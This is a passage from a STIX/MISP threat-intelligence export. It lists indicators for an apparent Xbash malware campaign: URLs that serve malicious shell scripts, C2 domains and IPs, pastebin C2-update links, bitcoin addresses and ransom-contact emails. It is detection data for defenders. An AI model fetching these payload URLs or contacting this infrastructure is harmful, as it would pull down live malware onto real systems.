"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4ce-484c-4c15-8ce5-4d5f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:10.000Z",
|
|
"modified": "2018-09-19T04:47:10.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/XbashY']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4ce-5a48-4f70-91c6-4ce9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:10.000Z",
|
|
"modified": "2018-09-19T04:47:10.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/xapache']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4ce-db6c-4068-8334-4a3b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:10.000Z",
|
|
"modified": "2018-09-19T04:47:10.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/libhttpd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4cf-b984-4242-bafc-49d0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:11.000Z",
|
|
"modified": "2018-09-19T04:47:11.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://xmr.enjoytopic.tk/l/rootv2.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4cf-0f64-408b-8b8d-42a0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:11.000Z",
|
|
"modified": "2018-09-19T04:47:11.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://xmr.enjoytopic.tk/l2/rootv2.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d0-bddc-4521-814d-473c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:12.000Z",
|
|
"modified": "2018-09-19T04:47:12.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://xmr.enjoytopic.tk/l/r88.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d0-1d8c-424a-b2d8-4430950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:12.000Z",
|
|
"modified": "2018-09-19T04:47:12.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://xmr.enjoytopic.tk/12/r88.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d1-1698-491d-a555-4331950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:13.000Z",
|
|
"modified": "2018-09-19T04:47:13.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/lowerv2.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d1-2518-4b2f-be8f-46e4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:13.000Z",
|
|
"modified": "2018-09-19T04:47:13.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/r88.sh']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d2-1cd0-4dbb-bb96-444e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:14.000Z",
|
|
"modified": "2018-09-19T04:47:14.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/XbashX']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d2-98dc-4ef9-a073-4449950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:14.000Z",
|
|
"modified": "2018-09-19T04:47:14.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://png.realtimenews.tk/m.png']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d2-39ec-4b98-ae74-42bb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:14.000Z",
|
|
"modified": "2018-09-19T04:47:14.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://daknobcq4zal6vbm.tk/tt.txt']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4d3-4da0-43c6-a073-4820950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:15.000Z",
|
|
"modified": "2018-09-19T04:47:15.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://d3goboxon32grk2l.tk/reg9.sct']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:47.000Z",
|
|
"modified": "2018-09-19T04:47:47.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'ejectrift.censys.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f3-ba24-4602-99bb-43fc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:47.000Z",
|
|
"modified": "2018-09-19T04:47:47.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.censys.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f4-fa84-48bf-a1b9-49b8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:48.000Z",
|
|
"modified": "2018-09-19T04:47:48.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'api.leakingprivacy.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f4-9b88-4f01-a225-42c6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:48.000Z",
|
|
"modified": "2018-09-19T04:47:48.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'news.realnewstime.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:48.000Z",
|
|
"modified": "2018-09-19T04:47:48.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.realnewstime.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f5-3b08-406a-8ad7-42cb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:49.000Z",
|
|
"modified": "2018-09-19T04:47:49.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'news.realtimenews.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f5-50fc-4482-9ed4-4360950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:49.000Z",
|
|
"modified": "2018-09-19T04:47:49.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scanaan.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f6-5598-4a65-8dd5-44ff950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:50.000Z",
|
|
"modified": "2018-09-19T04:47:50.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.3g2upl4pq6kufc4m.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f6-4230-4c9b-80fe-4167950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:50.000Z",
|
|
"modified": "2018-09-19T04:47:50.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.vfk2k5s5tfjr27tz.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:51.000Z",
|
|
"modified": "2018-09-19T04:47:51.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'scan.blockbitcoin.tk']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4f7-66f4-4d3f-ae76-40a8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:51.000Z",
|
|
"modified": "2018-09-19T04:47:51.000Z",
|
|
"description": "Domains for C2 Communication",
|
|
"pattern": "[domain-name:value = 'blockbitcoin.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d508-02d8-44e3-a778-27c3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:48:08.000Z",
|
|
"modified": "2018-09-19T04:48:08.000Z",
|
|
"description": "IPs for C2 Communication",
|
|
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '142.44.215.177']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:48:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"ip-dst\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d509-5e58-4d73-bd76-27c3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:48:09.000Z",
|
|
"modified": "2018-09-19T04:48:09.000Z",
|
|
"description": "IPs for C2 Communication",
|
|
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '144.217.61.147']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:48:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"ip-dst\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d51f-5344-4ba2-ae31-4bea950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:48:31.000Z",
|
|
"modified": "2018-09-19T04:48:31.000Z",
|
|
"description": "URLs for C2 Domain Updating",
|
|
"pattern": "[url:value = 'https://pastebin.com/raw/Xu74Mzif']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:48:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d51f-d130-4d8f-a046-4e27950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:48:31.000Z",
|
|
"modified": "2018-09-19T04:48:31.000Z",
|
|
"description": "URLs for C2 Domain Updating",
|
|
"pattern": "[url:value = 'https://pastebin.com/raw/rBHjTZY6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:48:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-attribute",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-attribute--5ba1d53e-c4bc-4bf0-8245-4a22950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:02.000Z",
|
|
"modified": "2018-09-19T04:49:02.000Z",
|
|
"labels": [
|
|
"misp:type=\"btc\"",
|
|
"misp:category=\"Financial fraud\"",
|
|
"misp:to_ids=\"True\""
|
|
],
|
|
"x_misp_category": "Financial fraud",
|
|
"x_misp_type": "btc",
|
|
"x_misp_value": "1Kss6v4eSUgP4WrYtfYGZGDoRsf74M7CMr"
|
|
},
|
|
{
|
|
"type": "x-misp-attribute",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-attribute--5ba1d53e-b274-4731-abbb-4920950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:02.000Z",
|
|
"modified": "2018-09-19T04:49:02.000Z",
|
|
"labels": [
|
|
"misp:type=\"btc\"",
|
|
"misp:category=\"Financial fraud\"",
|
|
"misp:to_ids=\"True\""
|
|
],
|
|
"x_misp_category": "Financial fraud",
|
|
"x_misp_type": "btc",
|
|
"x_misp_value": "1ExbdpvKJ6M1t5KyiZbnzsdQ63SEsY6Bff"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d55f-2fcc-49ac-b905-4e51950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:35.000Z",
|
|
"modified": "2018-09-19T04:49:35.000Z",
|
|
"description": "Email Addresses in Ransom Messages",
|
|
"pattern": "[email-message:to_refs[*].value = 'backupsql@protonmail.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:49:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"email-dst\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d560-0e08-460b-9909-480b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:36.000Z",
|
|
"modified": "2018-09-19T04:49:36.000Z",
|
|
"description": "Email Addresses in Ransom Messages",
|
|
"pattern": "[email-message:to_refs[*].value = 'backupsql@pm.me']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:49:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"email-dst\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d560-2538-43e3-8bb2-4d1f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:49:36.000Z",
|
|
"modified": "2018-09-19T04:49:36.000Z",
|
|
"description": "Email Addresses in Ransom Messages",
|
|
"pattern": "[email-message:to_refs[*].value = 'backupdatabase@pm.me']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:49:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"email-dst\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--5ba1d5ac-1460-4ba2-9ff1-458e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:50:52.000Z",
|
|
"modified": "2018-09-19T04:50:52.000Z",
|
|
"labels": [
|
|
"misp:name=\"paste\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "paste",
|
|
"value": "scan.vfk2k5s5tfjr27tz.tk\r\nscan.blockbitcoin.tkh",
|
|
"category": "Other",
|
|
"uuid": "5ba1d5ac-4b4c-486a-88ee-4b38950d210f"
|
|
},
|
|
{
|
|
"type": "text",
|
|
